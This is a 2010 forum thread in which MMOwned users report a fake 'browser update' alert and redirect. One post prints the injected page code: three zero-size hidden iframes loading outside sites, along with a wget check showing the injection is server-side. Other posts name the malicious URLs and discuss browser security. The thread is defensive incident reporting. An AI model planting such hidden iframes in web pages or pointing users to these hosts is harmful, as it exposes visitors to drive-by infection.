[VIRUS?] Your browser is old menu

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 19
  1. #1
    Danne206's Avatar Contributor
    Reputation
    183
    Join Date
    Jan 2008
    Posts
    717
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    [VIRUS?] Your browser is old

    DO NOT ACT WHEN YOU GET THE NOTIFICATION!!
    Close the page/tab and try again within the forum section (mmowned.com/forums/)!


    Hello.

    I was visiting MMOwned some minutes ago (INDEX, WWW.MMOWNED.COM), when I received a js:alert(). Due to the awful formating, external website address and the suspicious message - I guessed it was something wierd, sherlock huh?

    Just to be able to report this, I clicked "OK" to see where it got me. More information below.

    Alert text: GamerzExpress - Free games at your fingertips! says: "Warning! Your browser is old. please install the update"
    When: Visiting the very first page, mmowned.com. About 00:25 GMT+1
    Where it took me when clicking yes: hxxp://www.gamerzexpress.com/elenore/soc.php
    (Replaced http even tho the error on that page, I don't want to eventually infect anyone.)

    SCREENSHOT: http://www.f.djs-gaming.com/mmowned.png

    Hope that I was to help. Sorry if this was intentional
    Last edited by Danne206; 07-11-2010 at 08:18 PM.
    Dahnniel [DOT] s [AT] gmail [DOT] com

    [VIRUS?] Your browser is old
  2. #2
    Zoidberg's Avatar Elite User
    Reputation
    391
    Join Date
    Mar 2007
    Posts
    1,636
    Thanks G/R
    0/3
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    We already know this.

    Abra su mente a la realidad.
    Do NOT contact me about trading section stuff. Contact a section MOD instead.

  3. #3
    hayboy1213's Avatar Contributor
    Reputation
    118
    Join Date
    Sep 2008
    Posts
    194
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I got it too, i pressed ok, nothing happend, and norton diddnt catch anything.

  4. #4
    Pedregon's Avatar Contributor
    Reputation
    220
    Join Date
    Aug 2007
    Posts
    705
    Thanks G/R
    0/1
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I got this aswell.
    Leecher - 08-30-2007 - Contributor - 07-23-2008
    Donator - 06-19-2009
    My website



  5. #5
    Ground Zero's Avatar ★ Elder ★
    Reputation
    1132
    Join Date
    Aug 2008
    Posts
    3,504
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yes, we're aware do not install it, apoc has been contacted.

  6. #6
    Danne206's Avatar Contributor
    Reputation
    183
    Join Date
    Jan 2008
    Posts
    717
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Zoidberg View Post
    We already know this.
    Oh, I'm sorry. I must've missed any threads about this, but hey, just woke up so I'll blame it on that :d
    Dahnniel [DOT] s [AT] gmail [DOT] com

  7. #7
    Igzz's Avatar ✬✬✬✬✬✬✬✬✬✬ CoreCoins Purchaser
    Reputation
    908
    Join Date
    Jan 2007
    Posts
    1,897
    Thanks G/R
    59/76
    Trade Feedback
    2 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Apoc trying to h4x us!

    Nawh seriously though, I clicked cancel.


  8. #8
    soulchief's Avatar Member
    Reputation
    5
    Join Date
    May 2009
    Posts
    79
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I got it using chrome, but i clicked cancel... Chrome automatically updated without me even knowing :P

  9. #9
    Sednogmah's Avatar Contributor
    Reputation
    129
    Join Date
    Oct 2009
    Posts
    158
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    3 IFRAMEs have been added to the source of http://www.mmowned.com:
    Code:
    <html><body> 
    <iframe src="http://www.gamerzexpress.com" width="0" height="0" frameborder="0"></iframe>
    <iframe src="http://www.gamerzexpress.com/elenore/index.php?" width="0" height="0" frameborder="0"></iframe>
    <iframe src="http://www.darkwealth.com" width="0" height="0" frameborder="0"></iframe>
    </html></body>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    It's not injected via JavaScript but either generated directly by the web server or via MITM. Proof:
    Code:
    $ wget -qO - http://www.mmowned.com |grep gamerz >/dev/null && echo "Not injected via JavaScript."
    Not injected via JavaScript.
    Is there any chance that this is related to the recent alleged MMOwned hack?

    Originally Posted by Zoidberg View Post
    We already know this.
    Why is the site still online then?
    Last edited by Sednogmah; 07-11-2010 at 07:14 PM.

  10. #10
    dw~'s Avatar Master Sergeant
    Reputation
    13
    Join Date
    Feb 2010
    Posts
    120
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Could be a 'virus', editing the host file to disallow permission to MMOwned and perhaps redirecting to gamerzexpress or something.

    what did i say about the site being haxed yesterday...

  11. #11
    Dombo's Avatar Banned
    Reputation
    622
    Join Date
    Nov 2008
    Posts
    1,421
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Seems to point to some "Get Rich Online" forum, called DarkWealth as has been pointed out before.

    Both the site's owners are protected, thus you can't find their real names using a simple whois lookup.

    The most important url seems to be broken though (http://www.gamerzexpress.com/elenore/index.php)

    Originally Posted by Sednogmah View Post
    It's not injected via JavaScript but either generated directly by the web server or via MITM.
    I think it's generated by one of the sites.
    Last edited by Dombo; 07-11-2010 at 07:27 PM.

  12. #12
    soulchief's Avatar Member
    Reputation
    5
    Join Date
    May 2009
    Posts
    79
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Dombo View Post
    Seems to point to some "Get Rich Online" forum, called DarkWealth as has been pointed out before.

    Both the site's owners are protected, thus you can't find their real names using a simple whois lookup.

    The most important url seems to be broken though (http://www.gamerzexpress.com/elenore/index.php)



    I think it's generated by one of the sites.
    Site is also hosted on an offshore server, so cant get them shutdown either. Gamerzexpress could be shutdown though, hostgator is USA and they have warez on that site.
    Last edited by soulchief; 07-11-2010 at 07:32 PM.

  13. #13
    maclone's Avatar / Authenticator enabled
    Reputation
    2420
    Join Date
    Nov 2007
    Posts
    8,726
    Thanks G/R
    0/1029
    Trade Feedback
    0 (0%)
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    You should be save (for now) when you don't have java or adobe reader installed.
    But don't try your luck.
    Zomfg. And no, don't ask. - Dombo did it.

  14. #14
    Sednogmah's Avatar Contributor
    Reputation
    129
    Join Date
    Oct 2009
    Posts
    158
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by maclone View Post
    You should be save (for now) when you don't have java or adobe reader installed.
    But don't try your luck.
    Do you have any details on the problem? Both Adobe Reader & the Adobe Flash player have a long history of security flaws... but not Sun's JRE. The last JRE exploit is many months old.

    Generally it's not a bad idea to apply a whitelist approach to active web content, no matter if it's Flash, Shockwave, Java and even JavaScript. For example there's NoScript for Firefox. With that you don't have to uninstall Java, Flash or the Adobe Reader, at least not in order to stay relatively safe on the web.

    Windows XP users should beware the still unpatched help center exploit that allows attackers to run arbitrary code by crafting malicious websites: http://seclists.org/fulldisclosure/2010/Jun/205
    Last edited by Sednogmah; 07-11-2010 at 09:18 PM.

  15. #15
    Apoc's Avatar Angry Penguin
    Reputation
    1387
    Join Date
    Jan 2008
    Posts
    2,750
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Alright folks, I went through the paces, going from worst, to least, security wise.

    The iframes should be gone for good. However; if you do see another one pop up, please, PLEASE let me, or another staff member know. (They know how to contact me.)

    With the size of this site, and the others, it's a bit hard to find all the possibilities that an attacker can use to gain access to the servers.

    There are now newer (and a bit 'heavier') security measures in place, so if things seem a little strange, please send me a PM.

    This will likely be users being refused from connecting to the server, etc.

    I've also done quite a few things to the servers that I really shouldn't have had to do. But it's worth it in the end.

    I do apologize for anybody who has been infected by these *******s. But I appreciate that everyone cares enough to properly report the issue, and do a little research to help everyone else. Lets hope this doesn't happen again any time soon. (We're a very large site, and one of the largest WoW sites on the net, people attacking us is going to happen. So we simply deal with it as it happens.)

Page 1 of 2 12 LastLast

Similar Threads

  1. [Selling] Ready for Warlords of Draenor ? Buy Your High End , Old School or Rare WoW Account !
    By eLegit in forum WoW-EU Account Buy Sell Trade
    Replies: 1
    Last Post: 12-06-2013, 09:09 AM
  2. [Selling] Ready for Warlords of Draenor ? Buy Your High End , Old School or Rare WoW Account !
    By eLegit in forum World of Warcraft Buy Sell Trade
    Replies: 0
    Last Post: 12-04-2013, 07:11 PM
  3. Cut the rope in your browser!
    By Opirity in forum Gaming Chat
    Replies: 1
    Last Post: 01-31-2012, 08:41 AM
  4. [Tool] Draw in your Browser
    By Reflection in forum Art & Graphic Design
    Replies: 22
    Last Post: 03-22-2010, 09:55 AM
All times are GMT -5. The time now is 01:13 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search